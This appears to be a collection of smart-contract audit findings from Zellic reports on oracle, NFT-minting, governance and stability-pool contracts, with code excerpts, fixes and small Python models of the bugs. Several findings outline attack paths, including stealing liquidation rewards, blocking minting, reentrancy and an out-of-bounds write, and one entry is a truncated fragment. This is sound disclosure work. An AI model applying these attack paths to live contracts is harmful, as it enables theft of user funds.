otherwise it returns 0 if the signature is valid or 1 if it is invalid. Branches and code coverage (including function calls) Negative behavior Caller is not the EntryPoint contract. \u25a1 Negative test validationModule is not an enabled module. \u25a1 Negative test User operation is invalid. \u25a1 Negative test Function call analysis IAuthorizationModule(validationModule).validateUserOp(userOp, userOpHash) \u2013 External/Internal? External. \u2013 Argument control? validationModule, userOp, and userOpHash. \u2013 : Returns 0 if the signature is valid, or 1 if invalid. Can revert if the signature has an incorrect length or userOp.sender is the zero address. Function: withdrawDepositTo(address payable withdrawAddress, uint256 amount) Function available only for EntryPoint or self-call. Withdraw funds from the EntryPoint contract. Inputs withdrawAddress \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : The recipient of the withdrawn funds. amount \u2013 Control: Full control. \u2013 Constraints: No. \u2013 : Amount to be withdrawn. Branches and code coverage (including function calls) Intended branches withdrawAddress received the funds. \u25a1 Test coverage Negative behavior The caller is not entry point or this contract. \u25a1 Negative test Function call analysis EntryPoint.withdrawTo(withdrawAddress, amount) \u2013 External/Internal? External. \u2013 Argument control? withdrawAddress and amount. \u2013 : Transfer deposited funds from the EntryPoint to withdrawAddress. 5 Audit Results At the time of our audit, the audited code was not deployed to the Ethereum Mainnet. During our assessment on the scoped Biconomy Smart Account contracts, we discovered one finding, which was informational in nature.
Biconomy Labs acknowledged the finding and implemented a fix.", + "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Smart Account - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Key used in oracle entry storage is forgeable by trusted publisher", + "labels": [ + "Zellic" + ], + "body": "Target: oracle/library.cairo Category: Coding Mistakes Likelihood: Low Severity: High Impact: High The oracle/library.cairo code is responsible for much of the core implementation of the oracle itself. The oracle uses \u201centries\u201d to record the current value for a given asset pair or other kinds of tracked elements. The oracle code defines a \u201cpublish entry\u201d external function that allows callers to submit an entry to be recorded. The main authorization check is done by checking that the caller\u2019s address is equal to the expected publisher address. The expected publisher address is reported by the publisher registry contract. This check ensures that this transaction can only be performed by a preconfigured publisher. While this check ensures that the caller is, indeed, a preconfigured publisher, it does not key the entry by this caller address. Entries define multiple relevant properties. Namely, entries define a timestamp, the value, a pair id, a source, and a publisher. struct Entry: member pair_id : felt member value : felt member timestamp : felt member source : felt member publisher : felt end The pair id represents a string of the pair of assets this entry tracks. For example, this could be the felt value that represents the string \u201ceth/usd\u201d. The other interesting property is the source. The source and the publisher are not necessarily the same. The publisher attests to the value of data from a particular source. Therefore, an entry submitted by a publisher could contain any source string desired. Entries are stored in a map called Oracle_entry_storage, which is keyed by two values: the entry\u2019s pair id and the entry\u2019s source. Because entry sources can be any value decided by the publisher and entries are not keyed by their publisher, rogue publishers can overwrite the values set by other publishers. Approved publishers that have turned rogue can set entries for arbitrary sources and key ids even if those sources are the responsibility of other publishers. Consider either keying on publisher address or tracking which sources a particular publisher is allowed to publish. This will require an additional check that the specified source is allowed to be published by the calling publisher. The issue was addressed in a later update.
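The keying flaw is easy to see in a small Python model (illustrative only; the production code is Cairo): because the storage key omits the publisher, a second approved publisher can clobber the first one's entry by reusing the same (pair_id, source) pair.

# Minimal Python model of the keying flaw (the production code is Cairo).

oracle_entry_storage: dict[tuple[str, str], dict] = {}

def publish_entry(approved_publishers: set[str], caller: str,
                  pair_id: str, source: str, value: int) -> None:
    # Authorization only proves the caller is *some* approved publisher...
    assert caller in approved_publishers, 'not an approved publisher'
    # ...but the key does not include the publisher, so entries collide.
    oracle_entry_storage[(pair_id, source)] = {'value': value, 'publisher': caller}

approved = {'alice', 'mallory'}
publish_entry(approved, 'alice', 'eth/usd', 'somesource', 1900)
publish_entry(approved, 'mallory', 'eth/usd', 'somesource', 1)  # overwrites alice's entry
assert oracle_entry_storage[('eth/usd', 'somesource')]['value'] == 1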
", + "html_url": "https://github.com/Zellic/publications/blob/master/Empiric Oracle - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Publish entry does not validate caller address is not 0", + "labels": [ + "Zellic" + ], + "body": "Target: oracle/library.cairo Category: Coding Mistakes Likelihood: N/A Severity: Informational Impact: Informational When contracts in Starknet are directly invoked, the get_caller_address function can return 0. This is a relatively common error or default pattern in Starknet and Cairo, but it can cause security issues when this behavior is unexpected, like in the case of get_caller_address. In the publish entry code of the oracle/library.cairo file, the caller address is checked against the publisher address. The publisher address is retrieved by calling into the publisher registry contract and fetching the address of the publisher with a given felt-converted string name. If the publisher specified by this string does not exist, the publisher registry will actually return 0 instead of throwing an error. func Publisher_get_publisher_address{ syscall_ptr : felt*, pedersen_ptr : HashBuiltin*, range_check_ptr }(publisher : felt) -> (publisher_address : felt): let (publisher_address) = Publisher_publisher_address_storage.read( publisher) return (publisher_address) end This is because a read with a key that does not exist will return 0 values instead of throwing an error. Because no check is performed in the publisher registry that validates that non-zero values for publisher addresses will be returned, this allows the oracle code to check a 0 publisher address against a potentially 0 caller address, which can occur if the contract is invoked directly with --no_wallet. As of Starknet 0.10.0 this will not be an issue, but it is recommended to validate that the publisher registry get publisher address method does not return 0 values and/or that the oracle validates the caller is not 0. For example, a pre-0.10.0 Starknet environment would allow a caller to impersonate a publisher as long as the publisher does not exist in the publisher registry. In combination with a previous finding, this would allow an attacker to publish arbitrary entries even if they were not previously added to the registry. Validate, either in the publisher registry, that the returned publisher address is nonzero, or in the oracle, that the caller address is not zero. The issue was addressed in a later update.", + "html_url": "https://github.com/Zellic/publications/blob/master/Empiric Oracle - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Mathematical expressions could produce incorrect values", + "labels": [ + "Zellic" + ], + "body": "Target: oracle/library.cairo Category: Coding Mistakes Likelihood: Low Severity: Medium Impact: High It was observed in the yield curve Cairo code that in calculate_future_spot_yield_point some multiplication occurs with numbers that have not been given an upper bound. While integer overflow conditions are not strictly limited to multiplication, this is where we\u2019re most likely to find valid conditions for overflow behavior. In calculate_future_spot_yield_point, a call is made to starkware.cairo.common.pow where the exponent is output_decimals + spot_decimals - future_decimals. Based on how this function is called, future_decimals can, at least, be 1. No reasonable upper bound exists for the exponent, and pow, internally, performs unchecked multiplication. This means that the following expressions # Shift future/spot to the left by output_decimals + spot_decimals - future_decimals let (ratio_multiplier) = pow(10, output_decimals + spot_decimals - future_decimals) let (shifted_ratio, _) = unsigned_div_rem( future_entry.value * ratio_multiplier, spot_entry.value ) can result in integer overflow when performing the pow operation, as the exponent cap is 2^251. Note that this is not 251, but 2 raised to the 251. This will easily overflow the ratio_multiplier, causing the ratio to be an unexpected value. Mathematical expressions can miscalculate, causing incorrect spot pricing. Assert that the exponent passed to pow is less than some amount.
Additionally, provide additional assertions around entry valuation to ensure the provided number is reasonable and not at the limits of what a felt can support. The issue was addressed in a later update.", + "html_url": "https://github.com/Zellic/publications/blob/master/Empiric Oracle - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Faulty implementation of comparison function", + "labels": [ + "Zellic" + ], + "body": "Target: lib/time_series/utils.cairo Category: Coding Mistakes Likelihood: Low Severity: Medium Impact: Medium The are_equal function in time_series.utils incorrectly assumes that the is_nn function checks if the argument is negative. According to the documentation, however, this function checks if the argument is non-negative. This leads to an incorrect implementation, causing the are_equal function to return bogus values. func are_equal{range_check_ptr}(num1: felt, num2: felt) -> (_are_equal: Bool) { alloc_locals; let is_neg1 = is_nn(num1 - num2); let is_neg2 = is_nn(num2 - num1); let _are_equal = is_nn(is_neg1 + is_neg2 - 1); return (_are_equal,); } As an example, the are_equal function will have the following trace when run with arguments (3, 4), wrongly returning that the numbers are equal: is_neg1 = is_nn(3 - 4) => is_nn(-1) => 0; is_neg2 = is_nn(4 - 3) => is_nn(1) => 1 _are_equal = is_nn(0 + 1 - 1) => is_nn(0) => 1 The faulty are_equal function is used as a helper function by other statistical calculation functions under time_series/, which could lead to incorrect results. Rewrite the code according to the correct specification of the is_nn function: it returns 1 when the argument is non-negative. Write more unit tests for individual library functions to catch any incorrect implementations and edge cases that might not show up in an integration test. The issue was addressed in a later update.", + "html_url": "https://github.com/Zellic/publications/blob/master/Empiric Oracle - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Incorrect use of library comparison function", + "labels": [ + "Zellic" + ], + "body": "Target: computeengines/rebasedenomination/RebaseDenomination.cairo Category: Coding Mistakes Likelihood: Low Severity: Low Impact: Low The _decimal_div function uses the is_le function to compare the number of decimals between the numerator and the denominator. The specification of the is_le function states that it returns 1 when the first argument is less than or equal to the second argument: // Returns 1 if a <= b (or more precisely 0 <= b - a < RANGE_CHECK_BOUND). // Returns 0 otherwise. @known_ap_change func is_le{range_check_ptr}(a, b) -> felt { return is_nn(b - a); } The implementation of _decimal_div assumes otherwise. The is_le function will return TRUE if b_decimals <= a_decimals, that is, if a_decimals >= b_decimals. This is different from the code below, which assumes that the two numbers can only be equal in the else branch. let b_fewer_dec = is_le(b_decimals, a_decimals); if (b_fewer_dec == TRUE) { // x > y a_to_shift = a_value; result_decimals = a_decimals; tempvar range_check_ptr = range_check_ptr; } else { // x <= y As a result, the case when the two numbers are equal is handled by the first if branch instead of the else branch as expected by the code.
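Both misuses are easy to reproduce with a small Python model of the comparison helpers (felts simplified to plain integers; illustrative only):

# Python model of the Cairo comparison helpers (felts simplified to ints).

def is_nn(x: int) -> int:
    # Cairo's is_nn returns 1 when x is non-negative, 0 otherwise.
    return 1 if x >= 0 else 0

def is_le(a: int, b: int) -> int:
    # Returns 1 when a <= b, including the a == b case relevant to 3.5.
    return is_nn(b - a)

def are_equal_buggy(num1: int, num2: int) -> int:
    # Faithful translation of the flawed are_equal from 3.4; over plain
    # integers it returns 1 for every input pair, not only equal ones.
    is_neg1 = is_nn(num1 - num2)
    is_neg2 = is_nn(num2 - num1)
    return is_nn(is_neg1 + is_neg2 - 1)

assert are_equal_buggy(3, 4) == 1  # wrongly reports 3 == 4 as equal
assert is_le(5, 5) == 1            # equality takes the if branch in 3.5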
The correctness of the _decimal_div function is not affected by the incorrect usage of the is_le function, as the code for handling the first if branch and the equality case leads to the same outcome. However, this same mistake may show up in other places, and such assumptions should be carefully verified before using them in code. Rearrange the if conditions so that the case of equality is handled by the if branch rather than the else branch. The issue was addressed in a later update.", + "html_url": "https://github.com/Zellic/publications/blob/master/Empiric Oracle - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Out-of-bounds write in update test instruction", + "labels": [ + "Zellic" + ], + "body": "Target: oracle.c:upd_test Severity: High Impact: High Category: Coding Mistakes Likelihood: High Pyth exposes two instructions associated with test price accounts - one to initialize them, and another to update the account\u2019s pricing information. The update instruction sets pricing, status, and confidence intervals for the test account\u2019s price components using a loop that copies over values from the instruction data to the account. This loop iterates a number of times as specified by the caller, incrementing a variable used to index into the price components. for( uint32_t i=0; i != cmd->num_; ++i ) { pc_price_comp_t *ptr = &px->comp_[i]; ptr->latest_.status_ = PC_STATUS_TRADING; ptr->latest_.price_ = cmd->price_[i]; ptr->latest_.conf_ = cmd->conf_[i]; ptr->latest_.pub_slot_ = slot + (uint64_t)cmd->slot_diff_[i]; } upd_aggregate( px, slot+1 ); The supplied number of iterations this loop should run is not bounded in any way. This allows a caller to index past the end of the array, which has a fixed size of 32, and can allow an attacker to manipulate memory outside of the pricing components. Memory corruption is a critical violation of program integrity and safety guarantees. The ability to write out-of-bounds can violate the integrity of data structures and invariants in the contract. Thankfully, this instruction validates that only two accounts can be supplied in the invocation, which does help reduce the impact, but this behavior is still dangerous and may enable an attack resulting in price manipulation. The num_ variable is also referenced in upd_aggregate, which eventually leads to an out-of-bounds stack write that can potentially be leveraged to redirect control flow. The upd_test instruction should validate that cmd->num_ is equal to or less than PC_COMP_SIZE. This will prevent the out-of-bounds indexing and write behavior. The finding has been acknowledged by Pyth Data Association. Their official response is reproduced below: Pyth Data Association acknowledges the finding and a security fix for this issue will be deployed on or before April 18th.", + "html_url": "https://github.com/Zellic/publications/blob/master/Pyth Oracle Client - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Lack of rent exemption enforcement", + "labels": [ + "Zellic" + ], + "body": "Target: oracle.c Severity: High Impact: High Category: Business Logic Likelihood: Low To support the validators that maintain account state, Solana imposes rent on accounts. Every so often, if an account does not have more than the minimum required lamports to qualify as \u201crent exempt\u201d, an amount of lamports is collected as rent.
If an account\u2019s balance hits 0, the data for the account is forgotten, effectively resetting the account. Thus, it is possible to reinitialize accounts which have run out of lamports. Pyth uses accounts created and supplied by the caller to store data. Pyth does not require that these accounts maintain a balance large enough to qualify as \u201crent exempt\u201d. This means that a caller can supply an account with too few lamports, initialize it as a particular account type, and, after rent has drained the account, use the account as if it were brand new. This type of confusion can be found everywhere in the code, as rent is not enforced for any accounts supplied by the user. The lack of rent exemption checks can result in code invariants breaking, which can impact clients interacting with the state of these accounts or the contract itself. For example, product accounts can only be placed into a map if they haven\u2019t been initialized yet. This step, using the add_product instruction, requires the product account to be initialized but the data field empty. This should only be true if the product account has never been used before, but because this account can be wiped out due to rent, we can actually add this product account to multiple maps, resulting in the product\u2019s prod_ field pointing to an incorrect map. Pyth should either: 1. Use Program Derived Accounts (PDA) to manage state and delegate signing authority in a way similar to Solana\u2019s Token accounts (with an owner or authority field on the PDA). These accounts should be created with a minimum \u201crent exempt\u201d qualifying balance. 2. Require all accounts supplied by the user to be rent exempt. It should be sufficient to update both valid_signable_account and valid_writable_account with this check to get the desired mitigation in place. The finding has been acknowledged by Pyth Data Association. Their official response is reproduced below: Pyth Data Association acknowledges the finding and a security fix for this issue will be deployed on or before April 18th.
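For reference, the recommended validation could be sketched as follows (Python pseudocode with illustrative constants and hypothetical helper names; real Solana programs would consult the Rent sysvar): reject any caller-supplied account whose balance is below the rent-exemption minimum for its data size.

# Sketch (hypothetical names, illustrative constants) of the recommended
# mitigation: the account validation helpers enforce a rent-exemption floor.

LAMPORTS_PER_BYTE_YEAR = 3480     # illustrative constant, not authoritative
EXEMPTION_THRESHOLD_YEARS = 2     # illustrative constant, not authoritative
ACCOUNT_STORAGE_OVERHEAD = 128    # illustrative constant, not authoritative

def minimum_rent_exempt_balance(data_len: int) -> int:
    # Mirrors the shape of a rent-exemption minimum-balance calculation.
    return (ACCOUNT_STORAGE_OVERHEAD + data_len) * LAMPORTS_PER_BYTE_YEAR * EXEMPTION_THRESHOLD_YEARS

def valid_writable_account(lamports: int, data_len: int, owned_by_program: bool) -> bool:
    # Existing ownership/writability checks would live here; the added rule is
    # the rent-exemption floor, so the account can never be reaped and reset.
    return owned_by_program and lamports >= minimum_rent_exempt_balance(data_len)

assert valid_writable_account(10_000_000_000, 1024, True)
assert not valid_writable_account(1, 1024, True)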
", + "html_url": "https://github.com/Zellic/publications/blob/master/Pyth Oracle Client - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Inefficient publisher deletion algorithm results in excessive costs", + "labels": [ + "Zellic" + ], + "body": "Target: oracle.c:del_publisher Severity: Low Impact: Low Category: Optimization Likelihood: High The del_publisher instruction allows a caller to remove a publisher from a price account. To do this, the instruction first loops through the publishers on the price account\u2019s comp_ array. After identifying the index of comp_ with the publisher account, an inner loop runs which shifts all of the accounts down. static uint64_t del_publisher( SolParameters *prm, SolAccountInfo *ka ) { ... // try to remove publisher for(uint32_t i=0; i != sptr->num_; ++i ) { pc_price_comp_t *iptr = &sptr->comp_[i]; if ( pc_pub_key_equal( &iptr->pub_, &cptr->pub_ ) ) { for( unsigned j=i+1; j != sptr->num_; ++j ) { pc_price_comp_t *jptr = &sptr->comp_[j]; iptr[0] = jptr[0]; iptr = jptr; } --sptr->num_; sol_memset( iptr, 0, sizeof( pc_price_comp_t ) ); // update size of account sptr->size_ = sizeof( pc_price_t ) - sizeof( sptr->comp_ ) + sptr->num_ * sizeof( pc_price_comp_t ); return SUCCESS; } } } This is an inefficient way to remove the publisher account from the price account. This can result in higher fees for removing a publisher than would otherwise be necessary. It also increases code complexity, which may lead to bugs in the future. A more efficient solution would be to replace the publisher account with the last publisher account and then clear out the final publisher entry. A reference implementation is supplied. for(uint32_t i = 0; i != sptr->num_; ++i ) { pc_price_comp_t *iptr = &sptr->comp_[i]; // identify the targeted publisher entry if ( pc_pub_key_equal( &iptr->pub_, &cptr->pub_ ) ) { // select the last publisher entry pc_price_comp_t *substitute_ptr = &sptr->comp_[sptr->num_ - 1]; // swap the current publisher entry with the last one - it's okay if this is the same entry iptr[0] = substitute_ptr[0]; // clear out the last publisher sol_memset(substitute_ptr, 0, sizeof( pc_price_comp_t )); // reduce the number of publishers by one --sptr->num_; // recalculate size sptr->size_ = sizeof( pc_price_t ) - sizeof( sptr->comp_ ) + sptr->num_ * sizeof( pc_price_comp_t ); return SUCCESS; } } The finding has been acknowledged by Pyth Data Association. Their official response is reproduced below: Pyth Data Association acknowledges the finding, but doesn\u2019t believe it has security implications. However, we may deploy a bug fix to address it.", + "html_url": "https://github.com/Zellic/publications/blob/master/Pyth Oracle Client - Zellic Audit Report.pdf" + }, + { + "title": "8.02 for it (the ratio between buy and sell price is not quite 10 anymore, as user B buying at a viralit", + "labels": [ + "Zellic" + ], + "body": "8.02 for it (the ratio between buy and sell price is not quite 10 anymore, as user B buying at a virality", + "html_url": "https://github.com/Zellic/publications/blob/master/SAX - Zellic Audit Report.pdf" + }, + { + "title": "3.1 An attacker can break minting of ArpeggiSound and ArpeggiSong tokens", + "labels": [ + "Zellic" + ], + "body": "Target: ArpeggiSound, ArpeggiSong, AudioRegistryProtocol Category: Business Logic Likelihood: High Severity: Critical Impact: Critical ArpeggiSound.mintSample, ArpeggiSound.mintStem and ArpeggiSong.mintSong are vulnerable. We will use ArpeggiSong.mintSong as an example to demonstrate the issue, but everything below applies to ArpeggiSound.mintSample and ArpeggiSound.mintStem as well. When a new song NFT is minted, the following occurs. First, mintSong mints a new NFT by calling _safeMint. Second, mintSong creates an origin token[1]: AudioRegistryTypes.OriginToken memory originToken = AudioRegistryTypes.OriginToken({ tokenId: numSongs, chainId: block.chainid, contractAddress: address(this), originType: AudioRegistryTypes.OriginType.PRIMARY // primary }); Third, mintSong passes the origin token to the AudioRegistryProtocol.registerMedia function. Fourth, registerMedia creates a new media ID and attempts to tie the newly minted NFT to it. If the newly minted NFT is already tied to a media ID, the attempt fails and the transaction is reverted.[2] Anyone can register a new media ID and tie an unminted NFT to it, simply by calling
Therefore, anyone can break minting by registering a new media ID and tying a next- to-be-minted unminted NFT to it. An attacker can break minting of ArpeggiSound and ArpeggiSong tokens. Consider disallowing the registration of unminted NFTs. We provided a proof-of-concept to Arpeggi Labs. This issue was fixed by Arpeggi Labs in commit cc29275. Zellic Arpeggi Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Arpeggi_Labs_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.2 Potentially unsafe reentrancy in the minting functions", + "labels": [ + "Zellic" + ], + "body": "Target: ArpeggiSong, ArpeggiSound Category: Business Logic Likelihood: High Severity: Medium : Medium Arpeggi Studio allows users to mint samples, stems and songs and use them in the digital audio workstation. Samples are the smallest \u201cunits\u201d of sound (think of a hand- clap sound effect in a song) in the Arpeggi ecosystem. A stem is a single track of a song. It is created by sequencing one or more samples into a pattern. A song is composed of multiple stems. When a user creates music in Arpeggi Studio and is ready to mint a song, the Arpeggi Studio webapp processes the music and mints to the contract via various functions: ArpeggiSound.mintSample ArpeggiSound.mintStem ArpeggiSong.mintSong There is a reentrancy issue in all of the 3 functions above. We will focus on ArpeggiSo und.mintSample for the rest of this example. Below is a code snippet from mintSample: function mintSample( uint version, address artistAddress, address tokenOwner, string calldata dataUri, string calldata metadataUri ) { external payable whenNotPaused returns (uint256) _numSounds++; uint numSounds = _numSounds; _safeMint(tokenOwner, numSounds); /) registration logic is below In mintSample, the state variable _numSounds is incremented each time before a new Zellic Arpeggi Labs ERC721 token is minted. After _numSounds is incremented, the token is minted through _safeMint and a call is made to AudioRegistryProtocol.registerMedia to register the token\u2019s metadata in the AudioRegistryProtocol contract. A reentrancy attack is potentially possible because the increment of _numSounds hap- pens without checking if _numSounds has already been minted. Furthermore, the call to _safeMint happens before any of the registration logic is executed. This reentrancy issue allows an arbitrary amount of tokens to be minted in a way that breaks the expected mediaId-to-tokenId metadata storage schema for sample, stem and song tokens. For example, using reentrancy to mint 10 tokens results in this: token.contractAddress = 0xcf7...)), mediaId = 1, token.tokenId = 10 token.contractAddress = 0xcf7...)), mediaId = 2, token.tokenId = 9 token.contractAddress = 0xcf7...)), mediaId = 3, token.tokenId = 8 token.contractAddress = 0xcf7...)), mediaId = 4, token.tokenId = 7 token.contractAddress = 0xcf7...)), mediaId = 5, token.tokenId = 6 token.contractAddress = 0xcf7...)), mediaId = 6, token.tokenId = 5 token.contractAddress = 0xcf7...)), mediaId = 7, token.tokenId = 4 token.contractAddress = 0xcf7...)), mediaId = 8, token.tokenId = 3 token.contractAddress = 0xcf7...)), mediaId = 9, token.tokenId = 2 token.contractAddress = 0xcf7...)), mediaId = 10, token.tokenId = 1 Here, the minted tokens have their mediaId and tokenId values out of sync. We recommend that Arpeggi follows the checks-effects-interactions pattern by mov- ing the increment of _numSounds and the call to _safeMint after the registration logic at the end of the function. 
This will ensure that _numSounds is accurate and that the associated metadata is correct if mintSample is reentered. In addition to this, Arpeggi can make use of OpenZeppelin\u2019s ReentrancyGuard contract to add a nonReentrant modifier to all of the minting functions. We provided a proof-of-concept to Arpeggi Labs. This issue was fixed by Arpeggi Labs in commit 52cef08.", + "html_url": "https://github.com/Zellic/publications/blob/master/Arpeggi_Labs_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.3 Payable functions exist with no way to withdraw funds", + "labels": [ + "Zellic" + ], + "body": "Target: ArpeggiSong, ArpeggiSound Category: Business Logic Likelihood: High Severity: Medium Impact: Medium The mint functions mintSample, mintStem, and mintSong are declared payable, but there is no function to withdraw funds. The Arpeggi team stated that users will not pay for minting, so we recommend removing the payable modifier from these functions. This issue was fixed by Arpeggi Labs in commit 996c882.", + "html_url": "https://github.com/Zellic/publications/blob/master/Arpeggi_Labs_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.4 Origin token registration may result in a collision", + "labels": [ + "Zellic" + ], + "body": "Target: AudioRegistryProtocol Category: Business Logic Likelihood: n/a Severity: Medium Impact: Medium If an origin token t1 is registered and there is an attempt to register another origin token t2, such that t1.contractAddress == t2.contractAddress and t1.tokenId == t2.tokenId, a collision happens: t1 gets overwritten by t2 (in case the caller of registerMedia passes the checks in enforceOnlyOverwriteAuthorized) or the entire transaction gets reverted (otherwise). It is impossible to register two or more origin tokens with identical contractAddresses and tokenIds but different chainIds or originTypes. Consider replacing the _contractTokensToArpIndex mapping with an \u201corigin token\u201d-to-\u201cmedia ID\u201d mapping and reorganizing the code accordingly. This issue was fixed by Arpeggi Labs in commit bd3a6ec.", + "html_url": "https://github.com/Zellic/publications/blob/master/Arpeggi_Labs_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.5 The access control list for the Arpeggi admin role cannot be changed", + "labels": [ + "Zellic" + ], + "body": "Target: ArpeggiSound, ArpeggiSong Category: Business Logic Likelihood: n/a Severity: Low Impact: Low The ArpeggiSound and ArpeggiSong contracts do not set an admin role for ARPEGGI_ADMIN_ROLE. It is impossible to change the access control list for ARPEGGI_ADMIN_ROLE. Consider adding the following code to the constructors of ArpeggiSound and ArpeggiSong: _setRoleAdmin(Roles.ARPEGGI_ADMIN_ROLE, Roles.ARPEGGI_ADMIN_ROLE); This issue was fixed by Arpeggi Labs in commit 67f8be0.", + "html_url": "https://github.com/Zellic/publications/blob/master/Arpeggi_Labs_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.6 The UPGRADER_ROLE role is defined, but never used", + "labels": [ + "Zellic" + ], + "body": "Target: AudioRegistryProtocol Category: Business Logic Likelihood: n/a Severity: Low Impact: Low UPGRADER_ROLE is defined in AudioRegistryProtocol.sol at L12, but this role is never used anywhere.
We assume that UPGRADER_ROLE was intended to be used in the _authorizeUpgrade function, but _authorizeUpgrade uses DEFAULT_ADMIN_ROLE instead: function _authorizeUpgrade(address newImplementation) internal onlyRole(DEFAULT_ADMIN_ROLE) override {} The members of UPGRADER_ROLE are not given permission to upgrade the AudioRegistryProtocol contract. Consider modifying _authorizeUpgrade to replace DEFAULT_ADMIN_ROLE with UPGRADER_ROLE: function _authorizeUpgrade(address newImplementation) internal onlyRole(UPGRADER_ROLE) override {} This issue was fixed by Arpeggi Labs in commit 00524c4.", + "html_url": "https://github.com/Zellic/publications/blob/master/Arpeggi_Labs_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.1 New governance source may break transfer functionality", + "labels": [ + "Zellic" + ], + "body": "Target: CosmWasm Category: Coding Mistakes Likelihood: Low Severity: Low Impact: Low The AuthorizeGovernanceDataSourceTransfer action is used to modify the currently authorized governance source (i.e., the caller address that may perform governance actions through this contract). This is done through the execute_governance_instruction() function. Specifically, the AuthorizeGovernanceDataSourceTransfer action calls into transfer_governance(). This action allows the caller (who is the currently authorized governance source) to pass in a claim VAA that contains information about the new governance source to authorize. This claim VAA is supplied by the new governance source. To prevent replay attacks, the claim VAA also contains a governance_data_source_index, which needs to be larger than the currently stored index. If it is not, it means that a previous AuthorizeGovernanceDataSourceTransfer message is being replayed, and thus the contract will reject it. This check can be seen in the transfer_governance() function: fn transfer_governance( next_config: &mut ConfigInfo, current_config: &ConfigInfo, parsed_claim_vaa: &ParsedVAA, ) -> StdResult { // [ ... ] match claim_vaa_instruction.action { RequestGovernanceDataSourceTransfer { governance_data_source_index, } => { if current_config.governance_source_index >= governance_data_source_index { Err(PythContractError::OldGovernanceMessage)? } // [ ... ] } _ => Err(PythContractError::InvalidGovernancePayload)?, } } The governance_source_index configuration property is a u32, so if the new governance source passes in a RequestGovernanceDataSourceTransfer action with the governance_data_source_index property set to the maximum u32 value, then any subsequent RequestGovernanceDataSourceTransfer action can never have a higher governance_data_source_index property, and thus this action can never be performed again. We do not consider this a security issue, as the new governance source is considered to be a trusted entity by the protocol already. We do, however, recommend that this be fixed, as the new governance source may accidentally brick the governance source transfer functionality of the contract by passing in the maximum u32 value for the governance_data_source_index. Consider adding a check such that the governance_data_source_index is higher than the currently stored governance_source_index but still within a certain amount. Pyth Data Association acknowledges the finding and developed a patch for this issue: commit 3e104b41.
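The recommended bound might look like the following sketch (Python; MAX_INDEX_STEP is an assumed policy constant, and the real contract is CosmWasm Rust): the index must strictly increase, but only within a window, so a single claim VAA cannot jump straight to the maximum u32 value.

# Sketch of the recommended check (MAX_INDEX_STEP is an assumed constant;
# the real contract is CosmWasm Rust).

U32_MAX = 2**32 - 1
MAX_INDEX_STEP = 32  # assumed policy constant

def validate_new_index(current: int, proposed: int) -> None:
    if proposed <= current:
        raise ValueError('OldGovernanceMessage: index must increase')
    if proposed - current > MAX_INDEX_STEP:
        raise ValueError('index increase exceeds allowed window')

validate_new_index(7, 8)            # accepted
try:
    validate_new_index(7, U32_MAX)  # rejected: would brick future transfers
except ValueError as err:
    print(err)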
", + "html_url": "https://github.com/Zellic/publications/blob/master/Pyth Network CosmWasm - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Stealing of liquidation rewards in stability_pool", + "labels": [ + "Zellic" + ], + "body": "Target: stability_pool Category: Business Logic Likelihood: High Severity: High Impact: Critical The share of liquidation rewards entitled to APD depositors in the stability pool depends on the user\u2019s deposited amount relative to the value of the pool at the time of the liquidation call. // Compute share of the pool let (deposit_amount, _, next) = iterable_table::borrow_iter_mut(stability_pool_deposits, depositor); let share = ((*deposit_amount as u128) * SHARE_DECIMAL_CONSTANT) / (stability_pool_apd_amount as u128); ... let collateral_share_amount = ((((collateral_amount as u128) * share) / SHARE_DECIMAL_CONSTANT) as u64); *depositor_collateral_share = *depositor_collateral_share + collateral_share_amount; There is nothing to enforce that depositors of APD who are compensated from profitable liquidation events actually had APD deposited prior to the profitable liquidation event and hence exposure to losses. The above mechanism creates the following attack vector: 1. Identify profitable liquidation vaults (these are deterministic and can be determined from reviewing the liquidation compensation mechanism). 2. Deposit a large amount of APD into the liquidation pool to obtain a disproportionate share of the rewards. 3. Call liquidate, receive rewards, and withdraw them from the liquidity pool. With access to sufficient amounts of APD, a malicious user could claim the vast majority of the rewards. Such attacks would lead to loss of confidence in the protocol. Users would likely remove their funds from the stability pool due to lack of compensation for risks taken. The attack can be discouraged by enforcing timelocks on APD deposits into the stability pool. However, there is still the potential for gaming. For example, depending on market conditions, it could be economically rational to flood the pool with APD to steal liquidation rewards and ride out any subsequent exposure to losses in the stability pool. The use of timelocks would, however, prevent pool takeovers from flash loans. A more involved fix would be to require that compensation to APD depositors depend on the amount of time they have been in the pool. Of course, this also needs careful consideration, as it may discourage important sources of liquidity from supporting the pool if they are not going to be compensated for it. To mitigate risk-free profit from opportunistic deposits, the protocol now requires liquidity providers to hold funds in the pool for 24 hours or incur a linear fee. This solution would theoretically help significantly with the problem, but it would require separate review due to the presence of extensive architectural changes. We believe the fix does not entirely mitigate the issue: depositors can still front-run profitable events to add funds and accept the 24 hours of risk. We encourage Thala Labs to evaluate further mitigations (such as a short delay on the deposit side) and consider whether they would be helpful for the protocol economics.
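A toy model of the pro-rata payout (Python, illustrative; the production code is Move) shows why last-second deposits are profitable: the payout depends only on the deposit's share of the pool at liquidation time, with no notion of time spent in the pool.

# Toy Python model of the pro-rata payout (illustrative; real code is Move).

SHARE_DECIMAL_CONSTANT = 10**8

def payout(deposits: dict, collateral_amount: int) -> dict:
    total = sum(deposits.values())
    return {
        # share of the pool at liquidation time, mirroring the excerpt above
        who: collateral_amount * (amt * SHARE_DECIMAL_CONSTANT // total) // SHARE_DECIMAL_CONSTANT
        for who, amt in deposits.items()
    }

pool = {'honest': 1_000}
pool['attacker'] = 99_000      # deposited one block before calling liquidate()
print(payout(pool, 50_000))    # {'honest': 500, 'attacker': 49500}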
